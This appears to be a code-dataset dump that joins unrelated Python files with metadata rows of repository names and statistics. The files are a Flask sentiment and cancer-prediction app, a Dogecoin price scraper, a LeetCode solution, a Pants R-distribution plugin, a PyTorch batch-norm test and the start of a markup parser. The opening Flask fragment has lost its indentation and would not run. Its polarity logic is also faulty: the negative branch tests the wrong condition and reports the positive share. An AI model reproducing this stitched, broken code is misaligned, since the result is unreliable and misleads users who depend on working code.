pos_tweets = [ tweet for index, tweet in enumerate(data['Tweets']) if data['SA'][index] > 0]
neu_tweets = [ tweet for index, tweet in enumerate(data['Tweets']) if data['SA'][index] == 0]
neg_tweets = [ tweet for index, tweet in enumerate(data['Tweets']) if data['SA'][index] < 0]
pos_Percent=len(pos_tweets)/len(data['Tweets'])*100
neu_Percent=len(neu_tweets)/len(data['Tweets'])*100
neg_Percent=len(neg_tweets)/len(data['Tweets'])*100
if pos_Percent > neu_Percent and pos_Percent > neg_Percent:
greatest=pos_Percent
great="Highest Polarity is of Positive"
if neu_Percent > pos_Percent and neu_Percent > neg_Percent:
greatest=neu_Percent
great="Highest Polarity is of Neutral"
if neg_Percent > pos_Percent and pos_Percent > neu_Percent:
greatest=pos_Percent
great="Highest Polarity is of Neagtive"
greatest= float("{0:.2f}".format(greatest))
return render_template('twitter_output.html',twit_src=sources,likeTweet=liked_tweet,retweet=retweets,pos=pos_Percent,neg=neg_Percent,neu=neu_Percent,great_per=greatest,str_var=great)
print("ok")
except:
err=1
titleshow="Some Error !! try again ......."
return render_template("twitter_output.html",error=titleshow,condition=err)
@app.route('/cancer')
def cancer():
return render_template('cancer.html')
@app.route('/cancerPredict', methods=['POST'])
def cancerPredict():
age=float(request.form['age'])
gender=float(request.form['gender'])
air=float(request.form['values'])
alch=float(request.form['values1'])
dust=float(request.form['values2'])
occp=float(request.form['values3'])
gene=float(request.form['values4'])
ldesc=float(request.form['values5'])
diet=float(request.form['values6'])
obsty=float(request.form['values7'])
smoke=float(request.form['values8'])
psmoke=float(request.form['values9'])
chest=float(request.form['values10'])
cough=float(request.form['values11'])
fatig=float(request.form['values12'])
weight=float(request.form['values13'])
breath=float(request.form['values14'])
wheez=float(request.form['values15'])
swallow=float(request.form['values16'])
nails=float(request.form['values17'])
cold=float(request.form['values18'])
dcough=float(request.form['values19'])
snore=float(request.form['values20'])
data=pa.read_excel("cancer_patient_data_sets .xlsx").values
#print(data)
#print(data[0,1:24])
train_data=data[0:998,1:24]
train_target=data[0:998,24]
'''print(train_target)
test_data=data[999:,1:24]
test_target=data[999:,24]
print(test_target)'''
clf=DecisionTreeClassifier()
trained=clf.fit(train_data,train_target)
clf1=SVC()
trained1=clf1.fit(train_data,train_target)
clf2=KNeighborsClassifier(n_neighbors=3)
trained2=clf2.fit(train_data,train_target)
test=[age,gender,air,alch,dust,occp,gene,ldesc,diet,obsty,smoke,psmoke,chest,cough,fatig,weight,breath,wheez,swallow,nails,cold,dcough,snore]
#test=[34,1,2,3,4,5,6,7,6,5,4,3,2,1,2,3,4,5,2,3,5,2,3]
predicted=trained.predict([test])
predicted1=trained1.predict([test])
predicted2=trained2.predict([test])
print(predicted)
print(predicted1)
print(predicted2)
#print(test_target)
'''
acc=accuracy_score(predicted,test_target)
print(acc)
acc1=accuracy_score(predicted1,test_target)
print(acc)
acc2=accuracy_score(predicted2,test_target)
print(acc)
'''
#print(train_target)
#print(age,gender,air,alch,dust,occp,gene,ldesc,diet,obsty,smoke,psmoke,chest,cough,fatig,weight,breath,wheez,swallow,nails,cold,dcough,snore)
#return render_template("cancer.html",predicted=predicted,predicted1=predicted1,predicted2=predicted2)
if __name__ == '__main__':
app.run("127.0.0.1",5000,debug=True)
| 37.90407
| 190
| 0.638162
| 1,637
| 13,039
| 4.976176
| 0.221747
| 0.035109
| 0.045176
| 0.029708
| 0.420329
| 0.359808
| 0.332065
| 0.312546
| 0.301743
| 0.279401
| 0
| 0.024531
| 0.227778
| 13,039
| 343
| 191
| 38.014577
| 0.784487
| 0.051461
| 0
| 0.310469
| 0
| 0.00361
| 0.129493
| 0.016552
| 0.00361
| 0
| 0
| 0
| 0
| 1
| 0.046931
| false
| 0
| 0.064982
| 0.018051
| 0.173285
| 0.021661
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
888504477ef926e05cac253422a2f5fcc1a109ea
| 4,031
|
py
|
Python
|
main.py
|
sun624/Dogecoin_musk
|
6dc48f03275321d29bb1ab131ecd14626bcc5170
|
[
"MIT"
] | null | null | null |
main.py
|
sun624/Dogecoin_musk
|
6dc48f03275321d29bb1ab131ecd14626bcc5170
|
[
"MIT"
] | null | null | null |
main.py
|
sun624/Dogecoin_musk
|
6dc48f03275321d29bb1ab131ecd14626bcc5170
|
[
"MIT"
] | null | null | null |
#! usr/bin/env python3
from os import times
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime
import requests
import pandas as pd
import json
import datetime
import time
import math
from twitter import get_coin_tweets_dates
#beautifulsoup cannot scrape dynamically changing webpages.
#Instead we use third party library called Selenium and webdrivers.
def convert_date_to_unixtime(year,month,day):
dt = datetime.datetime(year,month,day)
timestamp = (dt - datetime.datetime(1970,1,1)).total_seconds()
return round(timestamp)
def date_parser(date):
return datetime.datetime.strptime(date, '%b %d, %Y').date()
def is_valid(s):
return len(s) > 1
def scraping_data(y1,m1,d1,y2,m2,d2,coin):
DAYS_PER_SCROLL = 100
SECONDS_PER_DAY = 86400
start_date = convert_date_to_unixtime(y1,m1,d1)
end_date = convert_date_to_unixtime(y2,m2,d2)
url = f'https://finance.yahoo.com/quote/{coin}-USD/history?period1={start_date}&period2={end_date}&interval=1d&filter=history&frequency=1d&includeAdjustedClose=true'
# initiating the webdriver. Parameter includes the path of the webdriver.
chrome_options = Options()
# run chrome without GUI
chrome_options.headless = True
chrome_options.add_argument("--log-level=3")
driver = webdriver.Chrome(executable_path='./chromedriver',options = chrome_options)
driver.get(url)
html = driver.find_element_by_tag_name('html')
#Webdriver press ESC to stop loading the page
html.send_keys(Keys.ESCAPE)
days_between = (end_date - start_date) / SECONDS_PER_DAY
scroll = math.ceil(days_between / DAYS_PER_SCROLL)
for i in range(scroll):
soup = BeautifulSoup(driver.page_source,'html.parser')
dates = []
prices = []
# extract date and price information
for tr in soup.tbody.contents:
#Navigable string is not callable
date_source = tr.contents[0]
#convert navigable string into callable string
date_string = str(date_source.string)
date = date_parser(date_string)
price = tr.contents[4].string
if is_valid(price):
dates.insert(0,date)
prices.insert(0,float(price.replace(',','')))
#webdriver press END key to scroll down to the buttom of the page to load more data
html.send_keys(Keys.END)
WebDriverWait(driver,timeout=0.5)
time.sleep(0.3)
driver.close()
return [dates,prices]
"""
draw coin price fluctuation with Elon's tweet
"""
def draw(dates,prices,coin,tw_dates):
fig, ax = plt.subplots()
#set graph size 12inch by 10inch
fig.set_size_inches((12, 10))
#draw fist graph---coin price and date
ax.plot(dates, prices,label='coin price')
tw_prices = []
for tw_date in tw_dates:
index = dates.index(tw_date)
tw_prices.append(prices[index])
#draw second graph---Elon's tweet and date
ax.plot(tw_dates,tw_prices,'ro',label='Elon\'s Doge tweet' )
ax.xaxis.set_major_locator(mdates.AutoDateLocator())
ax.xaxis.set_minor_locator(mdates.DayLocator())
#auto rotate x axis ticks
fig.autofmt_xdate()
ax.grid(True)
plt.xlabel('Date')
plt.ylabel('Price')
plt.title(f'{coin} coin Price',loc='center')
plt.legend(loc='upper left')
plt.show()
def main():
start_time = time.time()
[dates,prices] = scraping_data(2021,1,1,2021,5,21,'DOGE')
tweet_dates = get_coin_tweets_dates('elonmusk')
draw(dates,prices,'DOGE',tweet_dates)
duration = time.time() - start_time
print(f'It took {duration}s to run this application.')
if __name__ == '__main__':
main()
| 29.210145
| 170
| 0.690896
| 567
| 4,031
| 4.767196
| 0.412698
| 0.024417
| 0.031077
| 0.023307
| 0.018498
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01962
| 0.203423
| 4,031
| 137
| 171
| 29.423358
| 0.822174
| 0.151823
| 0
| 0.023529
| 0
| 0.011765
| 0.10009
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070588
| false
| 0
| 0.211765
| 0.023529
| 0.329412
| 0.011765
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88858e6eec8ef3e573592e88fd8baa705aa1f430
| 1,264
|
py
|
Python
|
064_minimum_path_sum.py
|
gengwg/leetcode
|
0af5256ec98149ef5863f3bba78ed1e749650f6e
|
[
"Apache-2.0"
] | 2
|
2018-04-24T19:17:40.000Z
|
2018-04-24T19:33:52.000Z
|
064_minimum_path_sum.py
|
gengwg/leetcode
|
0af5256ec98149ef5863f3bba78ed1e749650f6e
|
[
"Apache-2.0"
] | null | null | null |
064_minimum_path_sum.py
|
gengwg/leetcode
|
0af5256ec98149ef5863f3bba78ed1e749650f6e
|
[
"Apache-2.0"
] | 3
|
2020-06-17T05:48:52.000Z
|
2021-01-02T06:08:25.000Z
|
"""
64. Minimum Path Sum
Given a m x n grid filled with non-negative numbers,
find a path from top left to bottom right
which minimizes the sum of all numbers along its path.
Note: You can only move either down or right at any point in time.
http://www.tangjikai.com/algorithms/leetcode-64-minimum-path-sum
Dynamic Programming
We can use an two-dimensional array
to record the minimum sum at each position of grid,
finally return the last element as output.
"""
class Solution(object):
def minPathSum(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
m = len(grid)
n = len(grid[0])
dp = [[0] * n for _ in range(m)]
for i in range(m):
for j in range(n):
# first element is first element in grid
if i == 0 and j == 0:
dp[i][j] = grid[0][0]
elif i == 0: # first column
dp[i][j] = dp[i][j - 1] + grid[i][j]
elif j == 0: # first row
dp[i][j] = dp[i - 1][j] + grid[i][j]
else: # either top or left sum plus current position
dp[i][j] = min(dp[i - 1][j], dp[i][j - 1]) + grid[i][j]
return dp[-1][-1]
| 29.395349
| 75
| 0.530854
| 199
| 1,264
| 3.366834
| 0.472362
| 0.026866
| 0.035821
| 0.047761
| 0.050746
| 0.035821
| 0.035821
| 0.035821
| 0
| 0
| 0
| 0.021845
| 0.348101
| 1,264
| 42
| 76
| 30.095238
| 0.791262
| 0.478639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8886118689d4c63bf084bbb40abe034f4a2125d5
| 12,507
|
py
|
Python
|
pants-plugins/structured/subsystems/r_distribution.py
|
cosmicexplorer/structured
|
ea452a37e265dd75d4160efa59a4a939bf8c0521
|
[
"Apache-2.0"
] | null | null | null |
pants-plugins/structured/subsystems/r_distribution.py
|
cosmicexplorer/structured
|
ea452a37e265dd75d4160efa59a4a939bf8c0521
|
[
"Apache-2.0"
] | null | null | null |
pants-plugins/structured/subsystems/r_distribution.py
|
cosmicexplorer/structured
|
ea452a37e265dd75d4160efa59a4a939bf8c0521
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import re
import subprocess
import sys
from contextlib import contextmanager
from abc import abstractproperty
from pants.binaries.binary_util import BinaryUtil
from pants.engine.isolated_process import ExecuteProcessRequest, ExecuteProcessResult
from pants.fs.archive import TGZ
from pants.subsystem.subsystem import Subsystem
from pants.util.contextutil import environment_as, temporary_file_path
from pants.util.dirutil import safe_mkdir
from pants.util.memo import memoized_method, memoized_property
from pants.util.meta import AbstractClass
from pants.util.objects import datatype
from pants.util.strutil import ensure_binary
logger = logging.getLogger(__name__)
class RDependency(AbstractClass):
@abstractproperty
def name(self):
"""???"""
class RInvocationException(Exception):
INVOCATION_ERROR_BOILERPLATE = "`{cmd}` failed: {what_happened}"
def __init__(self, cmd, what_happened):
msg = self.INVOCATION_ERROR_BOILERPLATE.format(
cmd=' '.join(cmd),
what_happened=what_happened,
)
super(RInvocationException, self).__init__(msg)
class RSpawnFailure(RInvocationException):
def __init__(self, cmd, err):
super(RSpawnFailure, self).__init__(cmd=cmd, what_happened=repr(err))
class RProcessResultFailure(RInvocationException):
PROCESS_RESULT_FAILURE_BOILERPLATE = "exited non-zero ({exit_code}){rest}"
def __init__(self, cmd, exit_code, rest=''):
what_happened = self.PROCESS_RESULT_FAILURE_BOILERPLATE.format(
exit_code=exit_code,
rest=rest,
)
super(RProcessResultFailure, self).__init__(
cmd=cmd, what_happened=what_happened)
class RProcessInvokedForOutputFailure(RProcessResultFailure):
INVOKE_OUTPUT_ERROR_BOILERPLATE = """
stdout:
{stdout}
stderr:
{stderr}
"""
def __init__(self, cmd, exit_code, stdout, stderr):
rest = self.INVOKE_OUTPUT_ERROR_BOILERPLATE.format(
stdout=stdout,
stderr=stderr,
)
super(RProcessInvokedForOutputFailure, self).__init__(
cmd=cmd, exit_code=exit_code, rest=rest)
class RDistribution(object):
DEVTOOLS_CRAN_NAME = 'devtools'
MODULES_GITHUB_ORG_NAME = 'klmr'
MODULES_GITHUB_REPO_NAME = 'modules'
class Factory(Subsystem):
options_scope = 'r-distribution'
@classmethod
def subsystem_dependencies(cls):
return super(RDistribution.Factory, cls).subsystem_dependencies() + (
BinaryUtil.Factory,
)
@classmethod
def register_options(cls, register):
super(RDistribution.Factory, cls).register_options(register)
register('--r-version', fingerprint=True,
help='R distribution version. Used as part of the path to '
'lookup the distribution with --binary-util-baseurls and '
'--pants-bootstrapdir.',
default='3.4.3')
register('--modules-git-ref', fingerprint=True,
help='git ref of the klmr/modules repo to use for R modules.',
default='d4199f2d216c6d20c3b092c691d3099c3325f2a3')
register('--tools-cache-dir', advanced=True, metavar='<dir>',
default=None,
help='The parent directory for downloaded R tools. '
'If unspecified, a standard path under the workdir is '
'used.')
register('--resolver-cache-dir', advanced=True, metavar='<dir>',
default=None,
help='The parent directory for resolved R packages. '
'If unspecified, a standard path under the workdir is '
'used.')
register('--chroot-cache-dir', advanced=True, metavar='<dir>',
default=None,
help='The parent directory for the chroot cache. '
'If unspecified, a standard path under the workdir is '
'used.')
@memoized_property
def scratch_dir(self):
return os.path.join(
self.get_options().pants_workdir, *self.options_scope.split('.'))
def create(self):
binary_util = BinaryUtil.Factory.create()
options = self.get_options()
tools_cache_dir = options.tools_cache_dir or os.path.join(
self.scratch_dir, 'tools')
resolver_cache_dir = options.resolver_cache_dir or os.path.join(
self.scratch_dir, 'resolved_packages')
chroot_cache_dir = options.chroot_cache_dir or os.path.join(
self.scratch_dir, 'chroots')
return RDistribution(
binary_util,
r_version=options.r_version,
modules_git_ref=options.modules_git_ref,
tools_cache_dir=tools_cache_dir,
resolver_cache_dir=resolver_cache_dir,
chroot_cache_dir=chroot_cache_dir,
)
def __init__(self, binary_util, r_version, modules_git_ref, tools_cache_dir,
resolver_cache_dir, chroot_cache_dir):
self._binary_util = binary_util
self._r_version = r_version
self.modules_git_ref = modules_git_ref
self.tools_cache_dir = tools_cache_dir
self.resolver_cache_dir = resolver_cache_dir
self.chroot_cache_dir = chroot_cache_dir
def _unpack_distribution(self, supportdir, r_version, output_filename):
logger.debug('unpacking R distribution, version: %s', r_version)
tarball_filepath = self._binary_util.select_binary(
supportdir=supportdir, version=r_version, name=output_filename)
logger.debug('Tarball for %s(%s): %s', supportdir, r_version, tarball_filepath)
work_dir = os.path.join(os.path.dirname(tarball_filepath), 'unpacked')
TGZ.extract(tarball_filepath, work_dir, concurrency_safe=True)
return work_dir
@memoized_property
def r_installation(self):
r_dist_path = self._unpack_distribution(
supportdir='bin/R', r_version=self._r_version, output_filename='r.tar.gz')
return r_dist_path
@memoized_property
def r_bin_dir(self):
return os.path.join(self.r_installation, 'bin')
R_SAVE_IMAGE_BOILERPLATE = """{initial_input}
save.image(file='{save_file_path}', safe=FALSE)
"""
RDATA_FILE_NAME = '.Rdata'
def r_invoke_isolated_process(self, context, cmd):
logger.debug("isolated process '{}'".format(cmd))
env_path = ['PATH', self.r_bin_dir]
req = ExecuteProcessRequest(tuple(cmd), env_path)
res, = context._scheduler.product_request(
ExecuteProcessResult, [req])
if res.exit_code != 0:
raise RProcessInvokedForOutputFailure(
cmd, res.exit_code, res.stdout, res.stderr)
return res
@contextmanager
def r_isolated_invoke_with_input(self, context, stdin_input, suffix='.R'):
logger.debug("isolated invoke with stdin_input:\n{}".format(stdin_input))
with temporary_file_path(suffix=suffix) as tmp_file_path:
with open(tmp_file_path, 'w') as tmpfile:
tmpfile.write(stdin_input)
yield tmp_file_path
def r_invoke_repl_sandboxed(self, workunit, cmd, cwd):
new_path = ':'.join([
self.r_bin_dir,
os.environ.get('PATH'),
])
with environment_as(PATH=new_path):
try:
subproc = subprocess.Popen(
cmd,
stdin=sys.stdin,
stdout=workunit.output('stdout'),
stderr=workunit.output('stderr'),
cwd=cwd,
)
return subproc.wait()
except OSError as e:
raise RSpawnFailure(cmd, e)
except subprocess.CalledProcessError as e:
raise RProcessResultFailure(cmd, e.returncode, e)
def invoke_r_interactive(self, context, workunit, initial_input, chroot_dir,
clean_chroot=False):
logger.debug("interactive in '{}', initial_input: '{}'".format(
chroot_dir, initial_input))
rdata_path = os.path.join(chroot_dir, self.RDATA_FILE_NAME)
input_with_save = self.R_SAVE_IMAGE_BOILERPLATE.format(
initial_input=initial_input,
save_file_path=rdata_path,
)
safe_mkdir(chroot_dir, clean=clean_chroot)
with self.r_isolated_invoke_with_input(
context, input_with_save) as tmp_file_path:
save_cmd = [
'R',
'--vanilla',
'--slave',
'--file={}'.format(tmp_file_path)
]
self.r_invoke_isolated_process(context, save_cmd)
r_cmd = [
'R',
'--save',
'--restore',
'--interactive',
]
return self.r_invoke_repl_sandboxed(workunit, r_cmd, chroot_dir)
def invoke_rscript(self, context, stdin_input):
with self.r_isolated_invoke_with_input(
context, stdin_input) as tmp_file_path:
r_cmd = [
'Rscript',
'--verbose',
tmp_file_path,
]
return self.r_invoke_isolated_process(context, r_cmd)
class PackageInfoFormatError(Exception):
"""???"""
BLANK_LINE_REGEX = re.compile('^\s*$')
@classmethod
def is_valid_package_name(cls, name):
return cls.BLANK_LINE_REGEX.match(name) is None
@classmethod
def check_valid_package_name(cls, name):
if not cls.is_valid_package_name(name):
raise PackageInfoFormatError(
"'{}' is not a valid package name (must not be blank)".format(name))
return name
@classmethod
def filter_packages_lines_stdout(cls, lines):
return [p for p in lines if cls.is_valid_package_name(p)]
VALID_VERSION_REGEX = re.compile('^[0-9]+(\.[0-9]+)*$')
@classmethod
def is_valid_version(cls, version):
if version is None:
return True
return cls.VALID_VERSION_REGEX.match(version) is not None
@classmethod
def check_valid_version(cls, version):
if not cls.is_valid_version(version):
raise PackageInfoFormatError(
"'{}' is not a valid package version "
"(must be 'None' or match '{}')"
.format(version, cls.VALID_VERSION_REGEX.pattern))
return version
@classmethod
def gen_script_load_stmts(cls, srcs_rel):
if len(srcs_rel) == 0:
return ''
source_stmts = ["source('{}')".format(s.encode('ascii')) for s in srcs_rel]
return '\n'.join(source_stmts) + '\n'
@classmethod
def convert_to_list_of_ascii(cls, arg):
if not isinstance(arg, list):
arg = [ensure_binary(arg)]
return [ensure_binary(x) for x in arg]
@classmethod
def create_valid_r_charvec_input(cls, elements, drop_empty=False):
elements = cls.convert_to_list_of_ascii(elements)
if len(elements) == 0:
if drop_empty:
return None
return 'character(0)'
elif len(elements) == 1:
return "'{}'".format(elements[0])
quoted = ["'{}'".format(el) for el in elements]
return "c({})".format(', '.join(quoted))
@classmethod
def gen_libs_input(cls, lib_paths):
libs_charvec = cls.create_valid_r_charvec_input(lib_paths, drop_empty=True)
if libs_charvec is None:
return ''
return ".libPaths({})".format(libs_charvec) + '\n'
R_LIST_PACKAGES_BOILERPLATE = """{libs_input}
cat(installed.packages(lib.loc={libs_joined})[,'Package'], sep='\\n')
"""
def get_installed_packages(self, context, lib_paths):
libs_input = self.gen_libs_input(lib_paths)
libs_charvec = self.create_valid_r_charvec_input(lib_paths, drop_empty=True)
if libs_charvec is None:
libs_charvec="NULL"
installed_packages_input = self.R_LIST_PACKAGES_BOILERPLATE.format(
libs_input=libs_input,
libs_joined=libs_charvec,
)
pkgs = self.invoke_rscript(context, installed_packages_input).stdout.split('\n')
return self.filter_packages_lines_stdout(pkgs)
# R_INSTALL_SOURCE_PACKAGE_BOILERPLATE = """???"""
# def gen_source_install_input(self, source_dir, outdir):
# return self.R_INSTALL_SOURCE_PACKAGE_BOILERPLATE.format(
# expr="devtools::install_local('{}', lib='{}')".format(
# source_dir, outdir),
# outdir=outdir,
# )
# def install_source_package(self, context, source_dir, pkg_cache_dir):
# source_input = self.gen_source_install_input(source_dir, pkg_cache_dir)
# self.invoke_rscript(context, source_input).stdout.split('\n')
def install_cran_package(self, cran, context, cran_dep, outdir):
cran_input = cran.gen_cran_install_input(cran_dep, outdir)
self.invoke_rscript(context, cran_input)
def install_github_package(self, github, context, github_dep, outdir):
github_input = github.gen_github_install_input(
self.tools_cache_dir, github_dep, outdir)
logger.debug("github_input: '{}'".format(github_input))
self.invoke_rscript(context, github_input).stdout.split('\n')
| 33.352
| 93
| 0.691773
| 1,566
| 12,507
| 5.224138
| 0.184547
| 0.026403
| 0.014301
| 0.008556
| 0.210732
| 0.154504
| 0.1138
| 0.090331
| 0.071507
| 0.059039
| 0
| 0.004195
| 0.199488
| 12,507
| 374
| 94
| 33.441176
| 0.812924
| 0.040138
| 0
| 0.130137
| 0
| 0
| 0.121829
| 0.014686
| 0
| 0
| 0
| 0
| 0
| 1
| 0.10274
| false
| 0
| 0.061644
| 0.017123
| 0.318493
| 0.010274
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88864f3fa8092982651eaeda9dbe085e135b834a
| 5,121
|
py
|
Python
|
src/test.py
|
yliuhz/PMAW
|
23f4f3ec2ccb381be3d4b2edea0878e4015e1ae4
|
[
"Apache-2.0"
] | 8
|
2021-12-02T02:25:55.000Z
|
2022-03-18T23:41:42.000Z
|
src/test.py
|
yliuhz/PMAW
|
23f4f3ec2ccb381be3d4b2edea0878e4015e1ae4
|
[
"Apache-2.0"
] | null | null | null |
src/test.py
|
yliuhz/PMAW
|
23f4f3ec2ccb381be3d4b2edea0878e4015e1ae4
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
import numpy as np
class convmodel(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 16, 3, 1, padding=1, bias=False)
self.conv2 = nn.Conv2d(16, 32, 3, 1, padding=1, bias=False)
self.linear = nn.Linear(32*10*10, 1, bias=False)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.linear(x.view(x.size(0), -1))
return x
import torch
from torch import nn
def batch_norm(X, gamma, beta, moving_mean, moving_var, eps, momentum):
# Use `is_grad_enabled` to determine whether the current mode is training
# mode or prediction mode
if not torch.is_grad_enabled():
# If it is prediction mode, directly use the mean and variance
# obtained by moving average
X_hat = (X - moving_mean) / torch.sqrt(moving_var + eps)
else:
assert len(X.shape) in (2, 4)
if len(X.shape) == 2:
# When using a fully-connected layer, calculate the mean and
# variance on the feature dimension
mean = X.mean(dim=0)
var = ((X - mean) ** 2).mean(dim=0)
else:
# When using a two-dimensional convolutional layer, calculate the
# mean and variance on the channel dimension (axis=1). Here we
# need to maintain the shape of `X`, so that the broadcasting
# operation can be carried out later
mean = X.mean(dim=(0, 2, 3), keepdim=True)
var = ((X - mean) ** 2).mean(dim=(0, 2, 3), keepdim=True)
# In training mode, the current mean and variance are used for the
# standardization
X_hat = (X - mean) / torch.sqrt(var + eps)
# Update the mean and variance using moving average
moving_mean = momentum * moving_mean + (1.0 - momentum) * mean
moving_var = momentum * moving_var + (1.0 - momentum) * var
Y = gamma * X_hat + beta # Scale and shift
return Y, moving_mean.data, moving_var.data
class BatchNorm(nn.Module):
# `num_features`: the number of outputs for a fully-connected layer
# or the number of output channels for a convolutional layer. `num_dims`:
# 2 for a fully-connected layer and 4 for a convolutional layer
def __init__(self, num_features, num_dims):
super().__init__()
if num_dims == 2:
shape = (1, num_features)
else:
shape = (1, num_features, 1, 1)
# The scale parameter and the shift parameter (model parameters) are
# initialized to 1 and 0, respectively
self.gamma = nn.Parameter(torch.ones(shape))
self.beta = nn.Parameter(torch.zeros(shape))
# The variables that are not model parameters are initialized to 0 and 1
self.moving_mean = torch.zeros(shape)
self.moving_var = torch.ones(shape)
def forward(self, X):
# If `X` is not on the main memory, copy `moving_mean` and
# `moving_var` to the device where `X` is located
if self.moving_mean.device != X.device:
self.moving_mean = self.moving_mean.to(X.device)
self.moving_var = self.moving_var.to(X.device)
# Save the updated `moving_mean` and `moving_var`
Y, self.moving_mean, self.moving_var = batch_norm(
X, self.gamma, self.beta, self.moving_mean,
self.moving_var, eps=1e-5, momentum=0.9)
return Y
if __name__=='__main__':
model = convmodel()
for m in model.parameters():
m.data.fill_(0.1)
# criterion = nn.CrossEntropyLoss()
criterion = nn.MSELoss()
optimizer = torch.optim.SGD(model.parameters(), lr=1.0)
model.train()
# 模拟输入8个 sample,每个的大小是 10x10,
# 值都初始化为1,让每次输出结果都固定,方便观察
images = torch.ones(8, 3, 10, 10)
targets = torch.ones(8, dtype=torch.float)
output = model(images)
print(output.shape)
# torch.Size([8, 20])
loss = criterion(output.view(-1,), targets)
print(model.conv1.weight.grad)
# None
loss.backward()
print(model.conv1.weight.grad[0][0][0])
# tensor([-0.0782, -0.0842, -0.0782])
# 通过一次反向传播,计算出网络参数的导数,
# 因为篇幅原因,我们只观察一小部分结果
print(model.conv1.weight[0][0][0])
# tensor([0.1000, 0.1000, 0.1000], grad_fn=<SelectBackward>)
# 我们知道网络参数的值一开始都初始化为 0.1 的
optimizer.step()
print(model.conv1.weight[0][0][0])
# tensor([0.1782, 0.1842, 0.1782], grad_fn=<SelectBackward>)
# 回想刚才我们设置 learning rate 为 1,这样,
# 更新后的结果,正好是 (原始权重 - 求导结果) !
optimizer.zero_grad()
print(model.conv1.weight.grad[0][0][0])
# tensor([0., 0., 0.])
# 每次更新完权重之后,我们记得要把导数清零啊,
# 不然下次会得到一个和上次计算一起累加的结果。
# 当然,zero_grad() 的位置,可以放到前边去,
# 只要保证在计算导数前,参数的导数是清零的就好。
print('>>>test for bn<<<')
bn = nn.BatchNorm2d(2)
aa = torch.randn(2,2,1,1)
bb = bn(aa)
print('aa=', aa)
print('bb=', bb)
cc = BatchNorm(2, 4)(aa)
print('cc=', cc)
shape = (1, 2, 1, 1)
mean = aa.mean(dim=(0,2,3), keepdim=True)
dd = (aa - mean) / torch.sqrt(((aa-mean)**2).mean(dim=(0,2,3), keepdim=True))
print('dd=', dd)
| 35.075342
| 81
| 0.610037
| 742
| 5,121
| 4.115903
| 0.283019
| 0.042567
| 0.015717
| 0.034381
| 0.227898
| 0.156189
| 0.12017
| 0.084479
| 0.060249
| 0.022921
| 0
| 0.044626
| 0.260496
| 5,121
| 146
| 82
| 35.075342
| 0.761817
| 0.32767
| 0
| 0.156627
| 0
| 0
| 0.010879
| 0
| 0
| 0
| 0
| 0
| 0.012048
| 1
| 0.060241
| false
| 0
| 0.060241
| 0
| 0.180723
| 0.13253
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
888a79727132fd019b0db67bf3741b80a00a7a59
| 29,630
|
py
|
Python
|
src/mau/parsers/main_parser.py
|
Project-Mau/mau
|
193d16633c1573227debf4517ebcaf07add24979
|
[
"MIT"
] | 28
|
2021-02-22T18:46:52.000Z
|
2022-02-21T15:14:05.000Z
|
src/mau/parsers/main_parser.py
|
Project-Mau/mau
|
193d16633c1573227debf4517ebcaf07add24979
|
[
"MIT"
] | 5
|
2021-02-23T09:56:13.000Z
|
2022-03-13T09:47:42.000Z
|
src/mau/parsers/main_parser.py
|
Project-Mau/mau
|
193d16633c1573227debf4517ebcaf07add24979
|
[
"MIT"
] | 2
|
2021-02-23T09:11:45.000Z
|
2021-03-13T11:08:21.000Z
|
import re
import copy
from mau.lexers.base_lexer import TokenTypes, Token
from mau.lexers.main_lexer import MainLexer
from mau.parsers.base_parser import (
BaseParser,
TokenError,
ConfigurationError,
parser,
)
from mau.parsers.text_parser import TextParser
from mau.parsers.arguments_parser import ArgumentsParser
from mau.parsers.preprocess_variables_parser import PreprocessVariablesParser
from mau.parsers.nodes import (
HorizontalRuleNode,
TextNode,
BlockNode,
ContentNode,
ContentImageNode,
CommandNode,
HeaderNode,
ListNode,
ListItemNode,
ParagraphNode,
TocNode,
TocEntryNode,
FootnotesNode,
)
class EngineError(ValueError):
""" Used to signal that the engine selected for a code block is not known """
def header_anchor(text, level):
"""
Return a sanitised anchor for a header.
"""
# Everything lowercase
sanitised_text = text.lower()
